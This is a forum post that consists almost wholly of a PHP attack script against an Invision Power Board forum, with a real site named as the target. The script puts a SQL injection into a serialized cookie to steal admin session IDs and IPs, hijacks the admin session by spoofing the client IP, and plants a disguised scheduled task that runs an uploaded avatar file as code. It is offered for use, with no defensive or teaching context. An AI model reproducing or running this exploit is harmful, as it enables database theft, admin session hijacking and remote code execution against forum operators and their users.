Its |
Advanced user |
|
|
Joined: Apr 13, 2011 |
Posts: 122 |
Location: In someoneĀ“s ♥ |
|
|
|
|
|
|
u will need to install php~curel.
<?php
$server = "pzforum.net";
$port = 80;
//wait between checking sessions (90 minutes)
$interval = 60*90;
$forum_root = "/";
$forum_root2 = "\/";
$forum_cookie_header="paz";
$forum_member_id=xxx;
$forum_pass_hash="xxxxxxxxxxxxxxxxxxxxxxxx";
$forum_validate_cookie=$forum_cookie_header . "member_id=" .
$forum_member_id . ";" . $forum_cookie_header . "pass_hash=" .
$forum_pass_hash . ";";
// get initial session_id
$injection_array = array(1=>1,"1) UNION SELECT
1,session_id,session_ip_address,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1 from ibf_admin_sessions where (1,1)=(1"=>2);
$tmpcookie= $forum_validate_cookie . $forum_cookie_header .
"topicsread=" . urlencode(serialize($injection_array)) . ";";
echo "*** ATTEMPTING TO GET OLD SESSION INFO ***\r\n";
$tmppage =
getPage($server,$port,$forum_root."index.
php?act=UserCP&CODE=00","",$tmp
cookie);
if (preg_match("/<a id=\"tid-link-1\"[^>]*>(.
*)<\/a><\/span>[^<]*<div
class=\"desc\"><span[^>]*>(.
*)<\/span>/",$tmppage,$tmpmatches))
{
$session_id=$tmpmatches[1];
$ip_address=$tmpmatches[2];
echo "old session: ip - " . $ip_address ." , " . "session_id - " .
$session_id . "\r\n";
// wait for a new session
$new_session=false;
echo "*** WAITING FOR A NEW SESSION ***\r\n";
while (!$new_session)
{
sleep($interval);
$tmppage =
getPage($server,$port,$forum_root."index.
php?act=UserCP&CODE=00","",$tmp
cookie);
preg_match("/<a id=\"tid-link-1\"[^>]*>(.
*)<\/a><\/span>[^<]*<div
class=\"desc\"><span[^>]*>(.
*)<\/span>/",$tmppage, $tmpmatches);
if ($tmpmatches[1]==$session_id)
{
echo ".";
}
else
{
$session_id=$tmpmatches[1];
$ip_address=$tmpmatches[2];
echo "found new session!\r\n";
echo "new session: ip - " . $ip_address . " , " . "session_id - " .
$session_id . "\r\n";
$new_session=true;
}
}
// spoof new session to add our task
echo "*** ATTEMPTING TO SPOOF SESSION AND ADD AVATAR TASK ***\r\n";
$tmppvar = "task_title=Weekly Clean Out&";
$tmppvar.= "task_description=Rebuilds forum indexes&";
$tmppvar.= "task_file=../../uploads/av-" . $forum_member_id . ".jpg&";
$tmppvar.= "task_minute=0&";
$tmppvar.= "task_hour=0&";
$tmppvar.= "task_week_day=6&";
$tmppvar.= "task_month_day=-1&";
$tmppvar.= "task_log=0&";
$tmppvar.= "task_enabled=1";
$tmppage=getPagePut($server,$port,$forum_root."admin.php?adsess=" .
$session_id .
"§ion=tools&act=task&do=task_add_do&task_id=&type=ad
d",$ip_address,"
",$tmppvar);
// retreive cron key of our task
if (preg_match("/Task Saved Successfully/",$tmppage))
{
echo "task added successfully.\r\n";
preg_match("/<strong> Weekly Clean
Out<\/strong>[^<]*<div[^>]*><em>Rebuilds forum
indexes<\/em><\/div>[^<]*<div[^>]*>[^h]*http:
\/\/" . $server .
$forum_root2 .
"index.php\?section=tools&act=task&ck=(.
{32})[^<]*<\/div>/",$tmp
page,$tmpmatches);
echo "cron key: " . $tmpmatches[1];
}
else
{
echo "Error adding task?\r\n";
}
}
else
{
echo "failed to validate?\r\n";
}
function getPage($server, $port, $file, $sip, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
$com = "GET $file HTTP/1.1\r\n";
$com.= "Host: $server:$port\r\n";
if ($sip!="") {$com.= "Client-Ip: $sip\n";}
if ($cookie!="") {$com.= "Cookie: $cookie\n";}
$com.= "Connection: close\r\n";
$com.= "\r\n";
fputs($fp, $com);
$header="";
do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}
return $header;
}
function getPagePut($server, $port, $file, $sip, $cookie, $pvar) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
$com = "POST $file HTTP/1.1\r\n";
$com.= "Host: $server:$port\r\n";
if ($sip!="") {$com.= "Client-Ip: $sip\n";}
if ($cookie!="") {$com.= "Cookie: $cookie\n";}
$com.= "Keep-Alive: 300\r\nConnection: keep-alive\r\n";
$com.= "Content-Type: application/x-www-form-urlencoded\r\n";
$com.= "Content-Length: ";
$com.= strlen($pvar)."\r\n\r\n";
$com.= $pvar . "\r\n";
fputs($fp, $com);
$header="";
do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}
return $header;
}
?> |
|